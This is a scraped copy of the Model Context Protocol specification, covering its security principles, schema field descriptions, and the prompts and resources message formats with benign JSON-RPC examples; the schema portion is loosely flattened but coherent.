Clients may offer the following features to servers:
* **Sampling**: Server-initiated agentic behaviors and recursive LLM interactions
* **Roots**: Server-initiated inquiries into URI or filesystem boundaries to operate in
* **Elicitation**: Server-initiated requests for additional information from users
### Additional Utilities
* Configuration
* Progress tracking
* Cancellation
* Error reporting
* Logging
## Security and Trust & Safety
The Model Context Protocol enables powerful capabilities through arbitrary data access
and code execution paths. With this power comes important security and trust
considerations that all implementors must carefully address.
### Key Principles
1. **User Consent and Control**
* Users must explicitly consent to and understand all data access and operations
* Users must retain control over what data is shared and what actions are taken
* Implementors should provide clear UIs for reviewing and authorizing activities
2. **Data Privacy**
* Hosts must obtain explicit user consent before exposing user data to servers
* Hosts must not transmit resource data elsewhere without user consent
* User data should be protected with appropriate access controls
3. **Tool Safety**
* Tools represent arbitrary code execution and must be treated with appropriate
caution.
* In particular, descriptions of tool behavior such as annotations should be
considered untrusted, unless obtained from a trusted server.
* Hosts must obtain explicit user consent before invoking any tool
* Users should understand what each tool does before authorizing its use
4. **LLM Sampling Controls**
* Users must explicitly approve any LLM sampling requests
* Users should control:
* Whether sampling occurs at all
* The actual prompt that will be sent
* What results the server can see
* The protocol intentionally limits server visibility into prompts
### Implementation Guidelines
While MCP itself cannot enforce these security principles at the protocol level,
implementors **SHOULD**:
1. Build robust consent and authorization flows into their applications
2. Provide clear documentation of security implications
3. Implement appropriate access controls and data protections
4. Follow security best practices in their integrations
5. Consider privacy implications in their feature designs
## Learn More
Explore the detailed specification for each protocol component:
# Schema Reference
Source: https://modelcontextprotocol.io/specification/2025-11-25/schema
## JSON-RPC
### `Annotations`
Optional annotations for the client. The client can use annotations to inform how objects are used or displayed
audience?: Role\[]
Describes who the intended audience of this object or data is.
It can include multiple entries to indicate content useful for multiple audiences (e.g., \["user", "assistant"]).
priority?: number
Describes how important this data is for operating the server.
A value of 1 means "most important," and indicates that the data is
effectively required, while 0 means "least important," and indicates that
the data is entirely optional.
lastModified?: string
The moment the resource was last modified, as an ISO 8601 formatted string.
Should be an ISO 8601 formatted string (e.g., "2025-01-12T15:00:58Z").
Examples: last activity timestamp in an open file, timestamp when the resource
was attached, etc.
### `Cursor`
Cursor: string
An opaque token used to represent a cursor for pagination.
### `Icon`
An optionally-sized icon that can be displayed in a user interface.
src: string
A standard URI pointing to an icon resource. May be an HTTP/HTTPS URL or a data: URI with Base64-encoded image data.
Consumers SHOULD take steps to ensure URLs serving icons are from the
same domain as the client/server or a trusted domain.
Consumers SHOULD take appropriate precautions when consuming SVGs as they can contain
executable JavaScript.
mimeType?: string
Optional MIME type override if the source MIME type is missing or generic.
For example: "image/png", "image/jpeg", or "image/svg+xml".
sizes?: string\[]
Optional array of strings that specify sizes at which the icon can be used.
Each string should be in WxH format (e.g., "48x48", "96x96") or "any" for scalable formats like SVG.
If not provided, the client should assume that the icon can be used at any size.
theme?: "light" | "dark"
Optional specifier for the theme this icon is designed for. light indicates
the icon is designed to be used with a light background, and dark indicates
the icon is designed to be used with a dark background.
If not provided, the client should assume the icon can be used with any theme.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
ref: PromptReference | ResourceTemplateReference
argument: \{ name: string; value: string }
The argument's information
Type Declaration
name: string
The name of the argument
value: string
The value of the argument to use for completion matching.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
The submitted form data, only present when action is "accept" and mode was "form".
Contains values matching the requested schema.
Omitted for out-of-band mode responses.
The parameters for a request to elicit non-sensitive information from the user via a form in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode?: "form"
The elicitation mode.
message: string
The message to present to the user describing what information is being requested.
The parameters for a request to elicit information from the user via a URL in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode: "url"
The elicitation mode.
message: string
The message to present to the user explaining why the interaction is needed.
elicitationId: string
The ID of the elicitation, which must be unique within the context of the server.
The client MUST treat this ID as an opaque value.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
protocolVersion: string
The latest version of the Model Context Protocol that the client supports. The client MAY decide to support older versions as well.
protocolVersion: string
The version of the Model Context Protocol that the server wants to use. This may not match the version that the client requested. If the client cannot support this version, it MUST disconnect.
capabilities: ServerCapabilities
serverInfo: Implementation
instructions?: string
Instructions describing how to use the server and its features.
This can be used by clients to improve the LLM's understanding of available tools, resources, etc. It can be thought of like a "hint" to the model. For example, this information MAY be added to the system prompt.
Capabilities a client may support. Known capabilities are defined here, in this schema, but this is not a closed set: any client can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the client supports.
roots?: \{ listChanged?: boolean }
Present if the client supports listing roots.
Type Declaration
listChanged?: boolean
Whether the client supports notifications for changes to the roots list.
sampling?: \{ context?: object; tools?: object }
Present if the client supports sampling from an LLM.
Type Declaration
context?: object
Whether the client supports context inclusion via includeContext parameter.
If not declared, servers SHOULD only use includeContext: "none" (or omit it).
tools?: object
Whether the client supports tool use via tools and toolChoice parameters.
elicitation?: \{ form?: object; url?: object }
Present if the client supports elicitation from the server.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
version: string
description?: string
An optional human-readable description of what this implementation does.
This can be used by clients or servers to provide context about their purpose
and capabilities. For example, a server might describe the types of resources
or tools it provides, while a client might describe its intended use case.
websiteUrl?: string
An optional URL of the website for this implementation.
Capabilities that a server may support. Known capabilities are defined here, in this schema, but this is not a closed set: any server can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the server supports.
logging?: object
Present if the server supports sending log messages to the client.
completions?: object
Present if the server supports argument autocompletion suggestions.
prompts?: \{ listChanged?: boolean }
Present if the server offers any prompt templates.
Type Declaration
listChanged?: boolean
Whether this server supports notifications for changes to the prompt list.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
level: LoggingLevel
The level of logging that the client wants to receive from the server. The server should send all logs at this level and higher (i.e., more severe) to the client as notifications/message.
This notification can be sent by either side to indicate that it is cancelling a previously-issued request.
The request SHOULD still be in-flight, but due to communication latency, it is always possible that this notification MAY arrive after the request has already finished.
This notification indicates that the result will be unused, so any associated processing SHOULD cease.
A client MUST NOT attempt to cancel its initialize request.
For task cancellation, use the tasks/cancel request instead of this notification.
requestId?: RequestId
This MUST correspond to the ID of a request previously issued in the same direction.
This MUST be provided for cancelling non-task requests.
This MUST NOT be used for cancelling tasks (use the tasks/cancel request instead).
reason?: string
An optional string describing the reason for the cancellation. This MAY be logged or presented to the user.
An optional notification from the receiver to the requestor, informing them that a task's status has changed. Receivers are not required to send these notifications.
JSONRPCNotification of a log message passed from server to client. If no logging/setLevel request has been sent from the client, the server MAY decide which messages to send automatically.
An optional notification from the server to the client, informing it that the list of prompts it offers has changed. This may be issued by servers without any previous subscription from the client.
An optional notification from the server to the client, informing it that the list of resources it can read from has changed. This may be issued by servers without any previous subscription from the client.
A notification from the server to the client, informing it that a resource has changed and may need to be read again. This should only be sent if the client previously sent a resources/subscribe request.
A notification from the client to the server, informing it that the list of roots has changed.
This notification should be sent whenever the client adds, removes, or modifies any root.
The server should then request an updated list of roots using the ListRootsRequest.
An optional notification from the server to the client, informing it that the list of tools it offers has changed. This may be issued by servers without any previous subscription from the client.
A ping, issued by either the server or the client, to check that the other party is still alive. The receiver must promptly respond, or else may be disconnected.
The response to a tasks/result request.
The structure matches the result type of the original request.
For example, a tools/call task would return the CallToolResult structure.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
An optional description of what this prompt provides
arguments?: PromptArgument\[]
A list of arguments to use for templating the prompt.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uriTemplate: string
A URI template (according to RFC 6570) that can be used to construct resource URIs.
description?: string
A description of what this template is for.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type for all resources that match this template. This should only be included if all resources matching this template have the same type.
Sent from the client to request cancellation of resources/updated notifications from the server. This should follow a previous resources/subscribe request.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
Sent from the server to request a list of root URIs from the client. Roots allow
servers to ask for specific directories or files to operate on. A common example
for roots is providing a set of repositories or directories a server should operate
on.
This request is typically used when the server needs to understand the file system
structure or access specific locations that the client has permission to read from.
The client's response to a roots/list request from the server.
This result contains an array of Root objects, each representing a root directory
or file that the server can operate on.
Represents a root directory or file that the server can operate on.
uri: string
The URI identifying the root. This must start with file:// for now.
This restriction may be relaxed in future versions of the protocol to allow
other URI schemes.
name?: string
An optional name for the root. This can be used to provide a human-readable
identifier for the root, which may be useful for display purposes or for
referencing the root in other parts of the application.
A request from the server to sample an LLM via the client. The client has full discretion over which model to select. The client should also inform the user before beginning sampling, to allow them to inspect the request (human in the loop) and decide whether to approve it.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
messages: SamplingMessage[]
modelPreferences?: ModelPreferences
The server's preferences for which model to select. The client MAY ignore these preferences.
systemPrompt?: string
An optional system prompt the server wants to use for sampling. The client MAY modify or omit this prompt.
includeContext?: "none" | "thisServer" | "allServers"
A request to include context from one or more MCP servers (including the caller), to be attached to the prompt.
The client MAY ignore this request.
Default is "none". Values "thisServer" and "allServers" are soft-deprecated. Servers SHOULD only use these values if the client
declares ClientCapabilities.sampling.context. These values may be removed in future spec releases.
temperature?: number
maxTokens: number
The requested maximum number of tokens to sample (to prevent runaway completions).
The client MAY choose to sample fewer tokens than the requested maximum.
stopSequences?: string[]
metadata?: object
Optional metadata to pass through to the LLM provider. The format of this metadata is provider-specific.
tools?: Tool[]
Tools that the model may use during generation.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
toolChoice?: ToolChoice
Controls how the model uses tools.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
Default is { mode: "auto" }.
The client's response to a sampling/createMessage request from the server.
The client should inform the user before returning the sampled message, to allow them
to inspect the response (human in the loop) and decide whether to allow the server to see it.
The server's preferences for model selection, requested of the client during sampling.
Because LLMs can vary along multiple dimensions, choosing the "best" model is
rarely straightforward. Different models excel in different areas—some are
faster but less capable, others are more capable but more expensive, and so
on. This interface allows servers to express their priorities across multiple
dimensions to help clients make an appropriate selection for their use case.
These preferences are always advisory. The client MAY ignore them. It is also
up to the client to decide how to interpret these preferences and how to
balance them against other considerations.
hints?: ModelHint[]
Optional hints to use for model selection.
If multiple hints are specified, the client MUST evaluate them in order
(such that the first match is taken).
The client SHOULD prioritize these hints over the numeric priorities, but
MAY still use the priorities to select from ambiguous matches.
costPriority?: number
How much to prioritize cost when selecting a model. A value of 0 means cost
is not important, while a value of 1 means cost is the most important
factor.
speedPriority?: number
How much to prioritize sampling speed (latency) when selecting a model. A
value of 0 means speed is not important, while a value of 1 means speed is
the most important factor.
intelligencePriority?: number
How much to prioritize intelligence and capabilities when selecting a
model. A value of 0 means intelligence is not important, while a value of 1
means intelligence is the most important factor.
The result of a tool use, provided by the user back to the assistant.
type: "tool\_result"
toolUseId: string
The ID of the tool use this result corresponds to.
This MUST match the ID from a previous ToolUseContent.
content: ContentBlock\[]
The unstructured result content of the tool use.
This has the same format as CallToolResult.content and can include text, images,
audio, resource links, and embedded resources.
structuredContent?: { [key: string]: unknown }
An optional structured result object.
If the tool defined an outputSchema, this SHOULD conform to that schema.
isError?: boolean
Whether the tool use resulted in an error.
If true, the content typically describes the error that occurred.
Default: false
_meta?: { [key: string]: unknown }
Optional metadata about the tool result. Clients SHOULD preserve this field when
including tool results in subsequent sampling requests to enable caching optimizations.
id: string
This ID is used to match tool results to their corresponding tool uses.
name: string
The name of the tool to call.
input: { [key: string]: unknown }
The arguments to pass to the tool, conforming to the tool's input schema.
_meta?: { [key: string]: unknown }
Optional metadata about the tool use. Clients SHOULD preserve this field when
including tool uses in subsequent sampling requests to enable caching optimizations.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
content: ContentBlock[]
A list of content objects that represent the unstructured result of the tool call.
structuredContent?: { [key: string]: unknown }
An optional JSON object that represents the structured result of the tool call.
isError?: boolean
Whether the tool call ended in an error.
If not set, this is assumed to be false (the call was successful).
Any errors that originate from the tool SHOULD be reported inside the result
object, with isError set to true, not as an MCP protocol-level error
response. Otherwise, the LLM would not be able to see that an error occurred
and self-correct.
However, any errors in finding the tool, an error indicating that the
server does not support tool calls, or any other exceptional conditions,
should be reported as an MCP error response.
name: string
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
A human-readable description of the tool.
This can be used by clients to improve the LLM's understanding of available tools. It can be thought of like a "hint" to the model.
Additional properties describing a Tool to clients.
NOTE: all properties in ToolAnnotations are hints.
They are not guaranteed to provide a faithful description of
tool behavior (including descriptive properties like title).
Clients should never make tool use decisions based on ToolAnnotations
received from untrusted servers.
title?: string
A human-readable title for the tool.
readOnlyHint?: boolean
If true, the tool does not modify its environment.
Default: false
destructiveHint?: boolean
If true, the tool may perform destructive updates to its environment.
If false, the tool performs only additive updates.
(This property is meaningful only when readOnlyHint == false)
Default: true
idempotentHint?: boolean
If true, calling the tool repeatedly with the same arguments
will have no additional effect on its environment.
(This property is meaningful only when readOnlyHint == false)
Default: false
openWorldHint?: boolean
If true, this tool may interact with an "open world" of external
entities. If false, the tool's domain of interaction is closed.
For example, the world of a web search tool is open, whereas that
of a memory tool is not.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/index
**Protocol Revision**: 2025-11-25
Servers provide the fundamental building blocks for adding context to language models via
MCP. These primitives enable rich interactions between clients, servers, and language
models:
* **Prompts**: Pre-defined templates or instructions that guide language model
interactions
* **Resources**: Structured data or content that provides additional context to the model
* **Tools**: Executable functions that allow models to perform actions or retrieve
information
Each primitive can be summarized in the following control hierarchy:
| Primitive | Control | Description | Example |
| --------- | ---------------------- | -------------------------------------------------- | ------------------------------- |
| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options |
| Resources | Application-controlled | Contextual data attached and managed by the client | File contents, git history |
| Tools | Model-controlled | Functions exposed to the LLM to take actions | API POST requests, file writing |
Explore these key primitives in more detail below:
# Prompts
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/prompts
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose prompt
templates to clients. Prompts allow servers to provide structured messages and
instructions for interacting with language models. Clients can discover available
prompts, retrieve their contents, and provide arguments to customize them.
## User Interaction Model
Prompts are designed to be **user-controlled**, meaning they are exposed from servers to
clients with the intention of the user being able to explicitly select them for use.
Typically, prompts would be triggered through user-initiated commands in the user
interface, which allows users to naturally discover and invoke available prompts.
For example, a client might expose prompts as slash commands in its chat interface.
However, implementors are free to expose prompts through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
## Capabilities
Servers that support prompts **MUST** declare the `prompts` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"prompts": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available prompts changes.
## Protocol Messages
### Listing Prompts
To retrieve available prompts, clients send a `prompts/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "prompts/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"prompts": [
{
"name": "code_review",
"title": "Request Code Review",
"description": "Asks the LLM to analyze code quality and suggest improvements",
"arguments": [
{
"name": "code",
"description": "The code to review",
"required": true
}
],
"icons": [
{
"src": "https://example.com/review-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Getting a Prompt
To retrieve a specific prompt, clients send a `prompts/get` request. Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "prompts/get",
"params": {
"name": "code_review",
"arguments": {
"code": "def hello():\n print('world')"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"description": "Code review prompt",
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "Please review this Python code:\ndef hello():\n print('world')"
}
}
]
}
}
```
### List Changed Notification
When the list of available prompts changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/prompts/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: prompts/list
Server-->>Client: List of prompts
Note over Client,Server: Usage
Client->>Server: prompts/get
Server-->>Client: Prompt content
opt listChanged
Note over Client,Server: Changes
Server--)Client: prompts/list_changed
Client->>Server: prompts/list
Server-->>Client: Updated prompts
end
```
## Data Types
### Prompt
A prompt definition includes:
* `name`: Unique identifier for the prompt
* `title`: Optional human-readable name of the prompt for display purposes.
* `description`: Optional human-readable description
* `icons`: Optional array of icons for display in user interfaces
* `arguments`: Optional list of arguments for customization
### PromptMessage
Messages in a prompt can contain:
* `role`: Either "user" or "assistant" to indicate the speaker
* `content`: One of the following content types:
All content types in prompt messages support optional
[annotations](./resources#annotations) for metadata about audience, priority,
and modification times.
#### Text Content
Text content represents plain text messages:
```json theme={null}
{
"type": "text",
"text": "The text content of the message"
}
```
This is the most common content type used for natural language interactions.
#### Image Content
Image content allows including visual information in messages:
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/png"
}
```
The image data **MUST** be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where visual context is important.
#### Audio Content
Audio content allows including audio information in messages:
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
The audio data **MUST** be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where audio context is important.
#### Embedded Resources
Embedded resources allow referencing server-side resources directly in messages:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "resource://example",
"mimeType": "text/plain",
"text": "Resource content"
}
}
```
Resources can contain either text or binary (blob) data and **MUST** include:
* A valid resource URI
* The appropriate MIME type
* Either text content or base64-encoded blob data
Embedded resources enable prompts to seamlessly incorporate server-managed content like
documentation, code samples, or other reference materials directly into the conversation
flow.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
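For example, a `prompts/get` request that names a prompt the server does not define could produce a response like the following (a sketch; the exact error message and `data` payload are up to the server):

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 3,
  "error": {
    "code": -32602,
    "message": "Invalid params: unknown prompt name",
    "data": {
      "name": "nonexistent_prompt"
    }
  }
}
```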
## Implementation Considerations
1. Servers **SHOULD** validate prompt arguments before processing
2. Clients **SHOULD** handle pagination for large prompt lists
3. Both parties **SHOULD** respect capability negotiation
## Security
Implementations **MUST** carefully validate all prompt inputs and outputs to prevent
injection attacks or unauthorized access to resources.
# Resources
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/resources
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose
resources to clients. Resources allow servers to share data that provides context to
language models, such as files, database schemas, or application-specific information.
Each resource is uniquely identified by a
[URI](https://datatracker.ietf.org/doc/html/rfc3986).
## User Interaction Model
Resources in MCP are designed to be **application-driven**, with host applications
determining how to incorporate context based on their needs.
For example, applications could:
* Expose resources through UI elements for explicit selection, in a tree or list view
* Allow the user to search through and filter available resources
* Implement automatic context inclusion, based on heuristics or the AI model's selection
However, implementations are free to expose resources through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support resources **MUST** declare the `resources` capability:
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true,
"listChanged": true
}
}
}
```
The capability supports two optional features:
* `subscribe`: whether the client can subscribe to be notified of changes to individual
resources.
* `listChanged`: whether the server will emit notifications when the list of available
resources changes.
Both `subscribe` and `listChanged` are optional—servers can support neither,
either, or both:
```json theme={null}
{
"capabilities": {
"resources": {} // Neither feature supported
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true // Only subscriptions supported
}
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"listChanged": true // Only list change notifications supported
}
}
}
```
## Protocol Messages
### Listing Resources
To discover available resources, clients send a `resources/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "resources/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"resources": [
{
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"title": "Rust Software Application Main File",
"description": "Primary application entry point",
"mimeType": "text/x-rust",
"icons": [
{
"src": "https://example.com/rust-file-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Reading Resources
To retrieve resource contents, clients send a `resources/read` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "resources/read",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"contents": [
{
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}"
}
]
}
}
```
### Resource Templates
Resource templates allow servers to expose parameterized resources using
[URI templates](https://datatracker.ietf.org/doc/html/rfc6570). Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "resources/templates/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"resourceTemplates": [
{
"uriTemplate": "file:///{path}",
"name": "Project Files",
"title": "📁 Project Files",
"description": "Access files in the project directory",
"mimeType": "application/octet-stream",
"icons": [
{
"src": "https://example.com/folder-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
]
}
}
```
### List Changed Notification
When the list of available resources changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/list_changed"
}
```
### Subscriptions
The protocol supports optional subscriptions to resource changes. Clients can subscribe
to specific resources and receive notifications when they change:
**Subscribe Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "resources/subscribe",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Update Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/updated",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
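A client that no longer needs updates can cancel a subscription with a `resources/unsubscribe` request, which mirrors the subscribe request (shown here as a sketch):

**Unsubscribe Request:**

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 5,
  "method": "resources/unsubscribe",
  "params": {
    "uri": "file:///project/src/main.rs"
  }
}
```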
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Resource Discovery
Client->>Server: resources/list
Server-->>Client: List of resources
Note over Client,Server: Resource Template Discovery
Client->>Server: resources/templates/list
Server-->>Client: List of resource templates
Note over Client,Server: Resource Access
Client->>Server: resources/read
Server-->>Client: Resource contents
Note over Client,Server: Subscriptions
Client->>Server: resources/subscribe
Server-->>Client: Subscription confirmed
Note over Client,Server: Updates
Server--)Client: notifications/resources/updated
Client->>Server: resources/read
Server-->>Client: Updated contents
```
## Data Types
### Resource
A resource definition includes:
* `uri`: Unique identifier for the resource
* `name`: The name of the resource.
* `title`: Optional human-readable name of the resource for display purposes.
* `description`: Optional description
* `icons`: Optional array of icons for display in user interfaces
* `mimeType`: Optional MIME type
* `size`: Optional size in bytes
### Resource Contents
Resources can contain either text or binary data:
#### Text Content
```json theme={null}
{
"uri": "file:///example.txt",
"mimeType": "text/plain",
"text": "Resource content"
}
```
#### Binary Content
```json theme={null}
{
"uri": "file:///example.png",
"mimeType": "image/png",
"blob": "base64-encoded-data"
}
```
### Annotations
Resources, resource templates and content blocks support optional annotations that provide hints to clients about how to use or display the resource:
* **`audience`**: An array indicating the intended audience(s) for this resource. Valid values are `"user"` and `"assistant"`. For example, `["user", "assistant"]` indicates content useful for both.
* **`priority`**: A number from 0.0 to 1.0 indicating the importance of this resource. A value of 1 means "most important" (effectively required), while 0 means "least important" (entirely optional).
* **`lastModified`**: An ISO 8601 formatted timestamp indicating when the resource was last modified (e.g., `"2025-01-12T15:00:58Z"`).
Example resource with annotations:
```json theme={null}
{
"uri": "file:///project/README.md",
"name": "README.md",
"title": "Project Documentation",
